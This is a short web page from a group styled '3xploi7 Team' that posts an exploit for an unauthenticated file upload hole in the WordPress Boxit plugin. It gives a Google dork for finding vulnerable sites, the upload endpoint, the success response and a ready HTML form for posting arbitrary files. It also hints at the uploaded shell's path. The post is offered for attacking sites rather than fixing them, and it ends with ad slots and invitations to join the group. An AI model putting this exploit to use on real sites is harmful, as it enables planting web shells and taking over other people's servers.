Wordpress Boxit Plugins File Upload Vulnerability - 3xploi7 BuG

Wordpress Boxit Plugins File Upload Vulnerability


#- Title: Wordpress Boxit Plugins File Upload Vulnerability
#- Author: unknown
#- Date: 26/12/15
#- Developer : boxit.sd-dev .com
#- Link Download : codecanyon .net/item/boxit-the-dropbox-file-upload-for-wordpress/4425955
#- Google Dork: inurl:"/plugins/boxit/"
#- Fixed in Version : -
#- Tested on : Windows 
==================================================
-- Proof Of Concept --

When Vuln:
{"jsonrpc" : "2.0", "result" : "ok"} 

CSRF :

<formaction="http://target/wp-content/plugins/boxit/upload.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">
</form>

Shell PathHere

3xploi7 Team

2 Responses to "Wordpress Boxit Plugins File Upload Vulnerability"

Tempat Diskusi

Iklan Atas Artikel

3xploi7 1

seo explanation, online courses on digital marketing, internet marketing classes online

3xploi7 2

Iklan Bawah Artikel

Stay toon disini ya karena artikel akan selalu di update.
Kalau ada masalah silahkan gabung grup
Kunjungi Terus " 3xploi7 " untuk update menarik selanjutnya, Jangan sampai Terlewatkan.


• Join Grup Team :
 — Facebook Grup ( 5.325 Anggota )
 — Line Square